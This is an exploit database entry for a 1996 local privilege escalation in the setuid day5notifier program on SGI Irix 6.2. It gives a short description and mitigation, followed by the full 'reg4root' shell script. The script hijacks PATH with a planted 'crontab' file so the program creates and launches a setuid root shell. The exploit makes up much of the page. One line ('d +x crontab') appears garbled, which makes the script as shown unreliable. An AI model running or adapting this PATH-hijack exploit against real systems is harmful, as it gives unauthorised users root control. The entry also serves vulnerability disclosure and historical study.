Register me for Root!

vendor:

Irix 6.2

by:

Mike Neuman

7.2

CVSS

HIGH

Day5notifier Program Vulnerability

264

CWE

Product Name: Irix 6.2

Affected Version From: Irix 6.2

Affected Version To: Irix 6.2

Patch Exists: NO

Related CWE: N/A

CPE: o:sgi:irix:6.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

1996

A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain.

Mitigation:

Disable the day5notifier program or upgrade to a version that does not contain the vulnerability.

Source

Exploit-DB raw data:

#!/bin/sh
#source: https://www.securityfocus.com/bid/345/info
#
#A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root.
#
#day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain.

#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn@EnGarde.com
# 8/6/96

MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$

cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
d +x crontab

PATH=.:$PATH
export PATH

/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0

./suidshell

cd $MYPWD
rm -rf /tmp/emptydir.$$